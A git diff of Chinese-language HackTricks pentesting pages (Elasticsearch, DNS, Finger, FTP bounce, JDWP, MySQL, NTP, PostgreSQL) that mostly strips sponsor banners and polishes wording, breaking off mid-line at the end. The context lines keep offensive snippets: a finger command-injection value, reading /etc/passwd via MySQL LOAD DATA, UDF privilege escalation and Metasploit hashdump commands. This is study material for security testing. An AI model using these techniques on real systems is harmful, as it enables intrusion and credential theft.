- -**从黑客的角度看待您的网络应用、网络和云** - -**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化利用收集重要证据,将您的辛勤工作转化为有说服力的报告。 - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} - ## 基本信息 -Elasticsearch 是一个 **分布式**、**开源** 的搜索和分析引擎,适用于 **所有类型的数据**。它以 **速度**、**可扩展性** 和 **简单的 REST API** 而闻名。基于 Apache Lucene,它于2010年首次由 Elasticsearch N.V.(现在称为 Elastic)发布。Elasticsearch 是 Elastic Stack 的核心组件,这是一个用于数据摄取、丰富、存储、分析和可视化的开源工具集合。这个堆栈通常被称为 ELK Stack,还包括 Logstash 和 Kibana,现在有称为 Beats 的轻量级数据传输代理。 +Elasticsearch 是一个 **分布式**、**开源** 的搜索和分析引擎,适用于 **所有类型的数据**。它以 **速度**、**可扩展性** 和 **简单的 REST API** 而闻名。基于 Apache Lucene,它于 2010 年首次由 Elasticsearch N.V.(现在称为 Elastic)发布。Elasticsearch 是 Elastic Stack 的核心组件,这是一个用于数据摄取、丰富、存储、分析和可视化的开源工具集合。这个堆栈通常被称为 ELK Stack,还包括 Logstash 和 Kibana,现在还有称为 Beats 的轻量级数据传输代理。 ### 什么是 Elasticsearch 索引? Elasticsearch **索引** 是一组 **相关文档**,以 **JSON** 格式存储。每个文档由 **键** 和相应的 **值**(字符串、数字、布尔值、日期、数组、地理位置等)组成。 -Elasticsearch 使用一种称为 **倒排索引** 的高效数据结构来促进快速的全文搜索。该索引列出了文档中的每个唯一单词,并识别每个单词出现的文档。 +Elasticsearch 使用一种高效的数据结构,称为 **倒排索引**,以便快速进行全文搜索。该索引列出了文档中的每个唯一单词,并识别每个单词出现的文档。 在索引过程中,Elasticsearch 存储文档并构建倒排索引,从而实现近实时搜索。**索引 API** 用于在特定索引中添加或更新 JSON 文档。 @@ -28,7 +20,7 @@ Elasticsearch 使用一种称为 **倒排索引** 的高效数据结构来促进 ### 横幅 -用于访问 Elasticsearch 的协议是 **HTTP**。当您通过 HTTP 访问时,您会发现一些有趣的信息:`http://10.10.10.115:9200/` +用于访问 Elasticsearch 的协议是 **HTTP**。当您通过 HTTP 访问时,您会发现一些有趣的信息: `http://10.10.10.115:9200/` ![](<../images/image (294).png>) @@ -36,7 +28,7 @@ Elasticsearch 使用一种称为 **倒排索引** 的高效数据结构来促进 ### 认证 -**默认情况下,Elasticsearch 没有启用认证**,因此默认情况下您可以在不使用任何凭据的情况下访问数据库中的所有内容。 +**默认情况下,Elasticsearch 没有启用认证**,因此默认情况下,您可以在不使用任何凭据的情况下访问数据库中的所有内容。 您可以通过请求来验证认证是否已禁用: ```bash @@ -153,7 +145,7 @@ curl -X POST '10.10.10.115:9200/bookindex/books' -H 'Content-Type: application/j "name" : "how to get a job" }' ``` -该命令将创建一个 **新索引**,名为 `bookindex`,其文档类型为 `books`,具有属性 "_bookId_"、"_author_"、"_publisher_" 和 "_name_"。 +该命令将创建一个 **新索引**,名为 `bookindex`,其文档类型为 `books`,具有属性 "_bookId_"、"_author_"、"_publisher_" 和 "_name_" 注意 **新索引现在出现在列表中**: @@ -175,12 +167,5 @@ msf > use auxiliary/scanner/elasticsearch/indices_enum - `port:9200 elasticsearch` -
- -**从黑客的角度看待您的网络应用、网络和云** - -**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞利用收集重要证据,将您的辛勤工作转化为有说服力的报告。 - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-dns.md b/src/network-services-pentesting/pentesting-dns.md index 286b09577..f94fff872 100644 --- a/src/network-services-pentesting/pentesting-dns.md +++ b/src/network-services-pentesting/pentesting-dns.md @@ -2,17 +2,9 @@ {{#include ../banners/hacktricks-training.md}} -
- -**从黑客的角度看待您的网络应用、网络和云** - -**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞利用收集重要证据,将您的辛勤工作转化为有说服力的报告。 - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} - ## **基本信息** -**域名系统 (DNS)** 作为互联网的目录,使用户能够通过 **易于记忆的域名** 访问网站,如 google.com 或 facebook.com,而不是数字互联网协议 (IP) 地址。通过将域名转换为 IP 地址,DNS 确保网页浏览器能够快速加载互联网资源,简化我们在在线世界中的导航。 +**域名系统 (DNS)** 作为互联网的目录,使用户能够通过 **易于记忆的域名** 访问网站,如 google.com 或 facebook.com,而不是数字互联网协议 (IP) 地址。通过将域名转换为 IP 地址,DNS 确保网页浏览器能够快速加载互联网资源,简化了我们在在线世界中的导航方式。 **默认端口:** 53 ``` @@ -24,7 +16,7 @@ PORT STATE SERVICE REASON ### 不同的 DNS 服务器 - **DNS 根服务器**:这些服务器位于 DNS 层次结构的顶部,管理顶级域,仅在下级服务器未响应时介入。互联网名称与数字分配公司 (**ICANN**) 监督它们的运作,全球共有 13 个。 -- **权威名称服务器**:这些服务器对其指定区域的查询拥有最终决定权,提供明确的答案。如果它们无法提供响应,则查询将升级到根服务器。 +- **权威名称服务器**:这些服务器对其指定区域的查询拥有最终决定权,提供明确的答案。如果它们无法提供响应,查询将升级到根服务器。 - **非权威名称服务器**:这些服务器不拥有 DNS 区域,通过向其他服务器查询来收集域信息。 - **缓存 DNS 服务器**:这种类型的服务器会在设定时间内记住先前查询的答案,以加快未来请求的响应时间,缓存持续时间由权威服务器决定。 - **转发服务器**:转发服务器的角色简单,仅将查询转发到另一个服务器。 @@ -47,7 +39,7 @@ dig version.bind CHAOS TXT @DNS ``` ### **任何记录** -记录 **ANY** 将请求 DNS 服务器 **返回** 所有可用的 **条目**,这些条目是 **它愿意披露** 的。 +记录 **ANY** 将请求 DNS 服务器 **返回** 所有可用的 **条目**,这些 **条目** 是 **它愿意披露** 的。 ```bash dig any victim.com @ ``` @@ -85,7 +77,7 @@ nslookup > 127.0.0.1 #Reverse lookup of 127.0.0.1, maybe... > #Reverse lookup of a machine, maybe... ``` -### 有用的metasploit模块 +### 有用的 metasploit 模块 ```bash auxiliary/gather/enum_dns #Perform enumeration actions ``` @@ -156,22 +148,15 @@ dig google.com A @ ![](<../images/image (146).png>) -
- -**从黑客的角度看待您的网络应用、网络和云** - -**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化利用收集重要证据,将您的辛勤工作转化为有说服力的报告。 - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} ### 向不存在的账户发送邮件 -**使用受害者域向不存在的地址发送电子邮件** 可能会触发受害者发送一条未送达通知(NDN)消息,其**头部**可能包含有趣的信息,例如**内部服务器的名称和IP地址**。 +**向不存在的地址发送电子邮件**,使用受害者的域名可能会触发受害者发送一条未送达通知(NDN)消息,其**头部**可能包含有趣的信息,例如**内部服务器的名称和IP地址**。 ## 后期利用 - 检查Bind服务器的配置时,检查参数**`allow-transfer`**的配置,因为它指示谁可以执行区域传输,以及**`allow-recursion`**和**`allow-query`**,因为它们指示谁可以向其发送递归请求和请求。 -- 以下是可能在机器内部搜索的与DNS相关的文件名称: +- 以下是与DNS相关的文件名称,可能在机器中搜索时会很有趣: ``` host.conf /etc/resolv.conf @@ -239,12 +224,4 @@ Description: DNS enumeration without the need to run msfconsole Note: sourced from https://github.com/carlospolop/legion Command: msfconsole -q -x 'use auxiliary/scanner/dns/dns_amp; set RHOSTS {IP}; set RPORT 53; run; exit' && msfconsole -q -x 'use auxiliary/gather/enum_dns; set RHOSTS {IP}; set RPORT 53; run; exit' ``` -
- -**从黑客的角度看待您的网络应用、网络和云** - -**发现并报告具有实际商业影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,找到让您提升权限的安全问题,并使用自动化利用收集重要证据,将您的辛勤工作转化为有说服力的报告。 - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} - {{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-finger.md b/src/network-services-pentesting/pentesting-finger.md index 4adc80b03..debe951d8 100644 --- a/src/network-services-pentesting/pentesting-finger.md +++ b/src/network-services-pentesting/pentesting-finger.md @@ -2,17 +2,9 @@ {{#include ../banners/hacktricks-training.md}} -
- -**从黑客的角度看待您的网络应用程序、网络和云** - -**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞利用收集重要证据,将您的辛勤工作转化为有说服力的报告。 - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} - ## **基本信息** -**Finger**程序/服务用于检索计算机用户的详细信息。通常,提供的信息包括**用户的登录名、全名**,在某些情况下,还包括其他详细信息。这些额外的详细信息可能包括办公室位置和电话号码(如果可用)、用户登录的时间、非活动时间(闲置时间)、用户最后一次阅读邮件的时间,以及用户的计划和项目文件的内容。 +**Finger** 程序/服务用于检索计算机用户的详细信息。通常,提供的信息包括 **用户的登录名、全名**,在某些情况下,还包括其他详细信息。这些额外的详细信息可能包括办公室位置和电话号码(如果可用)、用户登录的时间、非活动时间(闲置时间)、用户最后一次阅读邮件的时间,以及用户的计划和项目文件的内容。 **默认端口:** 79 ``` @@ -60,12 +52,4 @@ finger "|/bin/ls -a /@example.com" finger user@host@victim finger @internal@external ``` -
- -**从黑客的角度看待您的网络应用、网络和云** - -**查找并报告具有实际商业影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化利用收集重要证据,将您的辛勤工作转化为有说服力的报告。 - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} - {{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md b/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md index 61735fd27..528b591d6 100644 --- a/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md +++ b/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md @@ -1,42 +1,26 @@ {{#include ../../banners/hacktricks-training.md}} -
- -**从黑客的角度看待您的网络应用、网络和云** - -**查找并报告具有实际商业影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞收集重要证据,将您的辛勤工作转化为有说服力的报告。 - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} - # 简介 -如果您可以访问一个跳转FTP服务器,您可以让它请求其他FTP服务器的文件(您知道一些凭据)并将该文件下载到您自己的服务器。 +如果您可以访问一个跳跃 FTP 服务器,您可以让它请求其他 FTP 服务器的文件(您知道一些凭据)并将该文件下载到您自己的服务器。 ## 要求 -- 在FTP中间服务器上的有效FTP凭据 -- 在受害者FTP服务器上的有效FTP凭据 -- 两个服务器都接受PORT命令(跳转FTP攻击) -- 您可以在FRP中间服务器的某个目录中写入 -- 中间服务器将比您有更多的访问权限进入受害者FTP服务器(这是您要利用的) +- 在 FTP 中间服务器上的有效 FTP 凭据 +- 在受害者 FTP 服务器上的有效 FTP 凭据 +- 两个服务器都接受 PORT 命令(跳跃 FTP 攻击) +- 您可以在 FRP 中间服务器的某个目录中写入 +- 中间服务器将比您有更多的访问权限进入受害者 FTP 服务器(这就是您要利用的) ## 步骤 -1. 连接到您自己的FTP服务器,并使连接被动(pasv命令),以便在受害者服务将发送文件的目录中监听 -2. 制作将要发送到受害者服务器的FTP中间服务器的文件(漏洞)。该文件将是所需命令的明文,以便对受害者服务器进行身份验证、改变目录并将文件下载到您自己的服务器。 -3. 连接到FTP中间服务器并上传之前的文件 -4. 使FTP中间服务器与受害者服务器建立连接并发送漏洞文件 -5. 在您自己的FTP服务器上捕获文件 -6. 从FTP中间服务器删除漏洞文件 +1. 连接到您自己的 FTP 服务器并使连接被动(pasv 命令),以便在受害者服务将发送文件的目录中监听 +2. 制作将要发送到受害者服务器的 FTP 中间服务器的文件(利用)。该文件将是所需命令的明文,以便对受害者服务器进行身份验证、切换目录并将文件下载到您自己的服务器。 +3. 连接到 FTP 中间服务器并上传之前的文件 +4. 使 FTP 中间服务器与受害者服务器建立连接并发送利用文件 +5. 在您自己的 FTP 服务器上捕获文件 +6. 从 FTP 中间服务器删除利用文件 有关更详细的信息,请查看帖子:[http://www.ouah.org/ftpbounce.html](http://www.ouah.org/ftpbounce.html) -
- -**从黑客的角度看待您的网络应用、网络和云** - -**查找并报告具有实际商业影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞收集重要证据,将您的辛勤工作转化为有说服力的报告。 - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md b/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md index b0f86976a..1177d7558 100644 --- a/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md +++ b/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md @@ -2,14 +2,6 @@ {{#include ../banners/hacktricks-training.md}} -
- -**从黑客的角度看待您的网络应用程序、网络和云** - -**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化利用收集重要证据,将您的辛勤工作转化为有说服力的报告。 - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} - ## 利用 JDWP 利用依赖于 **协议缺乏身份验证和加密**。它通常在 **8000 端口**上找到,但其他端口也是可能的。初始连接是通过向目标端口发送 "JDWP-Handshake" 来建立的。如果 JDWP 服务处于活动状态,它会以相同的字符串响应,确认其存在。此握手作为一种指纹识别方法,用于识别网络上的 JDWP 服务。 @@ -26,7 +18,7 @@ JDWP 利用依赖于 **协议缺乏身份验证和加密**。它通常在 **8000 ## 更多细节 -**这是 [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/) 的摘要**。请查看以获取更多细节。 +**这是[https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)的摘要**。请查看以获取更多细节。 1. **JDWP 概述**: @@ -35,25 +27,25 @@ JDWP 利用依赖于 **协议缺乏身份验证和加密**。它通常在 **8000 2. **JDWP 握手**: -- 使用简单的握手过程来启动通信。调试器(客户端)和被调试程序(服务器)之间交换一个 14 字符的 ASCII 字符串 “JDWP-Handshake”。 +- 使用简单的握手过程来启动通信。调试器(客户端)和被调试程序(服务器)之间交换一个14字符的ASCII字符串“JDWP-Handshake”。 3. **JDWP 通信**: - 消息具有简单的结构,包含长度、ID、标志和命令集等字段。 -- 命令集值范围从 0x40 到 0x80,表示不同的操作和事件。 +- 命令集值范围从0x40到0x80,表示不同的操作和事件。 4. **利用**: - JDWP 允许加载和调用任意类和字节码,带来安全风险。 -- 文章详细描述了一个五步的利用过程,包括获取 Java 运行时引用、设置断点和调用方法。 +- 文章详细描述了一个五步的利用过程,包括获取Java运行时引用、设置断点和调用方法。 5. **现实生活中的利用**: -- 尽管可能有防火墙保护,JDWP 服务在现实场景中是可发现和可利用的,正如在 ShodanHQ 和 GitHub 上的搜索所示。 -- 利用脚本已在各种 JDK 版本上进行了测试,并且是平台无关的,提供可靠的远程代码执行(RCE)。 +- 尽管可能有防火墙保护,JDWP服务在现实场景中是可发现和可利用的,正如在ShodanHQ和GitHub上的搜索所示。 +- 利用脚本已在各种JDK版本上进行了测试,并且是平台无关的,提供可靠的远程代码执行(RCE)。 6. **安全影响**: -- 互联网上开放的 JDWP 服务的存在强调了定期进行安全审查、在生产环境中禁用调试功能以及适当的防火墙配置的必要性。 +- 互联网上开放的JDWP服务的存在强调了定期进行安全审查、在生产环境中禁用调试功能以及适当的防火墙配置的必要性。 ### **参考文献:** @@ -70,12 +62,5 @@ JDWP 利用依赖于 **协议缺乏身份验证和加密**。它通常在 **8000 - [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html](http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html) - [http://nmap.org/nsedoc/scripts/jdwp-exec.html](http://nmap.org/nsedoc/scripts/jdwp-exec.html) -
- -**获取黑客对您的网络应用程序、网络和云的看法** - -**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们 20 多种自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化利用收集重要证据,将您的辛勤工作转化为有说服力的报告。 - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-modbus.md b/src/network-services-pentesting/pentesting-modbus.md index 996d0139b..f0f802c27 100644 --- a/src/network-services-pentesting/pentesting-modbus.md +++ b/src/network-services-pentesting/pentesting-modbus.md @@ -1,12 +1,5 @@ {{#include ../banners/hacktricks-training.md}} -
- -**从黑客的角度看待您的网络应用、网络和云** - -**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞利用收集重要证据,将您的辛勤工作转化为有说服力的报告。 - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} # 基本信息 diff --git a/src/network-services-pentesting/pentesting-mysql.md b/src/network-services-pentesting/pentesting-mysql.md index 073c0c777..b148ce7cb 100644 --- a/src/network-services-pentesting/pentesting-mysql.md +++ b/src/network-services-pentesting/pentesting-mysql.md @@ -2,15 +2,9 @@ {{#include ../banners/hacktricks-training.md}} -
- -[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的事件之一。该大会的 **使命是促进技术知识**,是各个学科技术和网络安全专业人士的热烈交流点。 - -{% embed url="https://www.rootedcon.com/" %} - ## **基本信息** -**MySQL** 可以被描述为一个开源的 **关系数据库管理系统 (RDBMS)**,可免费使用。它基于 **结构化查询语言 (SQL)**,使得数据库的管理和操作成为可能。 +**MySQL** 可以被描述为一个开源的 **关系数据库管理系统 (RDBMS)**,是免费的。它基于 **结构化查询语言 (SQL)**,使得数据库的管理和操作成为可能。 **默认端口:** 3306 ``` @@ -28,7 +22,7 @@ mysql -u root -p # A password will be asked (check someone) mysql -h -u root mysql -h -u root@localhost ``` -## External Enumeration +## 外部枚举 某些枚举操作需要有效的凭据 ```bash @@ -107,7 +101,7 @@ SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCT #@ Functions not from sys. db SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys'; ``` -您可以在文档中查看每个权限的含义: [https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv_execute) +您可以在文档中查看每个权限的含义: [https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv_execute) ### MySQL 文件 RCE @@ -117,8 +111,8 @@ SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCT ## MySQL 客户端任意读取文件 -实际上,当您尝试 **load data local into a table** 文件的 **内容** 时,MySQL 或 MariaDB 服务器会要求 **客户端读取它** 并发送内容。**然后,如果您可以篡改 mysql 客户端以连接到您自己的 MySQL 服务器,您可以读取任意文件。**\ -请注意,这是使用时的行为: +实际上,当您尝试 **load data local into a table** 文件的 **内容** 时,MySQL 或 MariaDB 服务器会要求 **客户端读取它** 并发送内容。 **然后,如果您可以篡改 mysql 客户端以连接到您自己的 MySQL 服务器,您可以读取任意文件。**\ +请注意,这是使用以下方式的行为: ```bash load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n'; ``` @@ -135,11 +129,7 @@ ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv opti ​ -
-​​[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的事件之一。该大会的 **使命是促进技术知识**,是各个学科技术和网络安全专业人士的热烈交流点。 - -{% embed url="https://www.rootedcon.com/" %} ## POST @@ -152,7 +142,7 @@ systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '= ``` #### mysqld.cnf 的危险设置 -在 MySQL 服务的配置中,使用各种设置来定义其操作和安全措施: +在 MySQL 服务的配置中,使用了各种设置来定义其操作和安全措施: - **`user`** 设置用于指定 MySQL 服务将以哪个用户身份执行。 - **`password`** 用于建立与 MySQL 用户相关联的密码。 @@ -181,7 +171,7 @@ grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mys ``` ### 特权提升通过库 -如果 **mysql 服务器以 root 身份运行**(或其他更高权限的用户),您可以使其执行命令。为此,您需要使用 **用户定义函数**。要创建用户定义函数,您需要一个运行 mysql 的操作系统的 **库**。 +如果 **mysql 服务器以 root 用户**(或其他更特权的用户)运行,您可以使其执行命令。为此,您需要使用 **用户定义函数**。要创建用户定义函数,您需要一个 **库**,该库适用于运行 mysql 的操作系统。 可以在 sqlmap 和 metasploit 中找到要使用的恶意库,通过执行 **`locate "*lib_mysqludf_sys*"`**。**`.so`** 文件是 **linux** 库,**`.dll`** 是 **Windows** 库,选择您需要的。 @@ -240,7 +230,7 @@ grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_na ``` ### 启用日志记录 -您可以通过取消注释以下行来启用 `/etc/mysql/my.cnf` 中的 mysql 查询日志记录: +您可以通过取消注释以下行在 `/etc/mysql/my.cnf` 中启用 mysql 查询的日志记录: ![](<../images/image (899).png>) @@ -619,10 +609,4 @@ Note: sourced from https://github.com/carlospolop/legion Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit' ``` -
- -[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的活动之一。这个大会 **旨在促进技术知识**,是各个学科技术和网络安全专业人士的一个热烈交流点。 - -{% embed url="https://www.rootedcon.com/" %} - {{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-ntp.md b/src/network-services-pentesting/pentesting-ntp.md index 568737eb4..392491ee5 100644 --- a/src/network-services-pentesting/pentesting-ntp.md +++ b/src/network-services-pentesting/pentesting-ntp.md @@ -2,24 +2,9 @@ {{#include ../banners/hacktricks-training.md}} -
- -加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! - -**黑客洞察**\ -参与深入探讨黑客的刺激与挑战的内容 - -**实时黑客新闻**\ -通过实时新闻和见解,跟上快速变化的黑客世界 - -**最新公告**\ -了解最新的漏洞赏金计划和重要平台更新 - -**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作吧! - ## 基本信息 -**网络时间协议 (NTP)** 确保计算机和网络设备在可变延迟网络中准确同步时钟。它对于维护IT操作、安全和日志记录中的精确计时至关重要。NTP的准确性至关重要,但如果管理不当,也会带来安全风险。 +**网络时间协议 (NTP)** 确保计算机和网络设备在可变延迟网络中准确同步其时钟。它对于维护IT操作、安全和日志记录中的精确计时至关重要。NTP的准确性是必不可少的,但如果管理不当,也会带来安全风险。 ### 摘要与安全提示: @@ -86,19 +71,4 @@ Name: Nmap Description: Enumerate NTP Command: nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 {IP} ``` -
- -加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! - -**黑客洞察**\ -参与深入探讨黑客的刺激与挑战的内容 - -**实时黑客新闻**\ -通过实时新闻和见解,跟上快速变化的黑客世界 - -**最新公告**\ -了解最新的漏洞赏金发布和重要平台更新 - -**今天就加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作吧! - {{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-postgresql.md b/src/network-services-pentesting/pentesting-postgresql.md index e45d86b1d..16f1f348f 100644 --- a/src/network-services-pentesting/pentesting-postgresql.md +++ b/src/network-services-pentesting/pentesting-postgresql.md @@ -1,20 +1,13 @@ # 5432,5433 - Pentesting Postgresql -
- -\ -使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=pentesting-postgresql) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\ -立即获取访问权限: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pentesting-postgresql" %} {{#include ../banners/hacktricks-training.md}} ## **基本信息** -**PostgreSQL** 被描述为一个 **对象关系数据库系统**,是 **开源** 的。该系统不仅使用 SQL 语言,还通过附加功能增强了它。它的能力使其能够处理各种数据类型和操作,成为开发人员和组织的多功能选择。 +**PostgreSQL** 被描述为一个 **对象关系数据库系统**,它是 **开源** 的。该系统不仅使用 SQL 语言,还通过额外的功能增强了它。它的能力使其能够处理各种数据类型和操作,成为开发人员和组织的多功能选择。 -**默认端口:** 5432,如果此端口已被使用,postgresql 似乎会使用下一个未使用的端口(可能是 5433)。 +**默认端口:** 5432,如果该端口已被使用,似乎 postgresql 将使用下一个未使用的端口(可能是 5433)。 ``` PORT STATE SERVICE 5432/tcp open pgsql @@ -88,7 +81,7 @@ connect_timeout=10'); ``` - 主机已关闭 -`详细信息:无法连接到服务器:没有到主机的路由 服务器是否在主机 "1.2.3.4" 上运行并接受端口 5678 的 TCP/IP 连接?` +`详细信息:无法连接到服务器:没有到主机的路由。服务器是否在主机 "1.2.3.4" 上运行并接受端口 5678 的 TCP/IP 连接?` - 端口已关闭 ``` @@ -120,14 +113,14 @@ running on host "1.2.3.4" and accepting TCP/IP connections on port 5678? | rolsuper | 角色具有超级用户权限 | | rolinherit | 角色自动继承其成员角色的权限 | | rolcreaterole | 角色可以创建更多角色 | -| rolcreatedb | 角色可以创建数据库 | +| rolcreatedb | 角色可以创建数据库 | | rolcanlogin | 角色可以登录。也就是说,这个角色可以作为初始会话授权标识符 | | rolreplication | 角色是一个复制角色。复制角色可以启动复制连接并创建和删除复制槽。 | | rolconnlimit | 对于可以登录的角色,这设置了该角色可以建立的最大并发连接数。-1 表示没有限制。 | -| rolpassword | 不是密码(始终显示为 `********`) | +| rolpassword | 不是密码(始终显示为 `********`) | | rolvaliduntil | 密码过期时间(仅用于密码认证);如果没有过期则为 null | -| rolbypassrls | 角色绕过每个行级安全策略,更多信息请参见 [Section 5.8](https://www.postgresql.org/docs/current/ddl-rowsecurity.html)。 | -| rolconfig | 角色特定的运行时配置变量默认值 | +| rolbypassrls | 角色绕过每个行级安全策略,更多信息请参见 [Section 5.8](https://www.postgresql.org/docs/current/ddl-rowsecurity.html)。 | +| rolconfig | 角色特定的运行时配置变量默认值 | | oid | 角色的 ID | #### 有趣的组 @@ -287,15 +280,11 @@ copy (select convert_from(decode('','base64'),'utf-8')) to '/ju ../pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md {{#endref}} -## -**漏洞赏金提示**:**注册** **Intigriti**,这是一个由黑客为黑客创建的高级 **漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金! - -{% embed url="https://go.intigriti.com/hacktricks" %} ### 通过本地文件写入更新 PostgreSQL 表数据 -如果您拥有读取和写入 PostgreSQL 服务器文件的必要权限,您可以通过 **覆盖关联的文件节点** 来更新服务器上的任何表 [在 PostgreSQL 数据目录中](https://www.postgresql.org/docs/8.1/storage.html)。**关于此技术的更多信息** [**在这里**](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users)。 +如果您拥有读取和写入 PostgreSQL 服务器文件的必要权限,您可以通过 **覆盖关联的文件节点** 来更新服务器上的任何表 [PostgreSQL 数据目录](https://www.postgresql.org/docs/8.1/storage.html)。 **关于此技术的更多信息** [**在这里**](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users)。 所需步骤: @@ -305,7 +294,7 @@ copy (select convert_from(decode('','base64'),'utf-8')) to '/ju SELECT setting FROM pg_settings WHERE name = 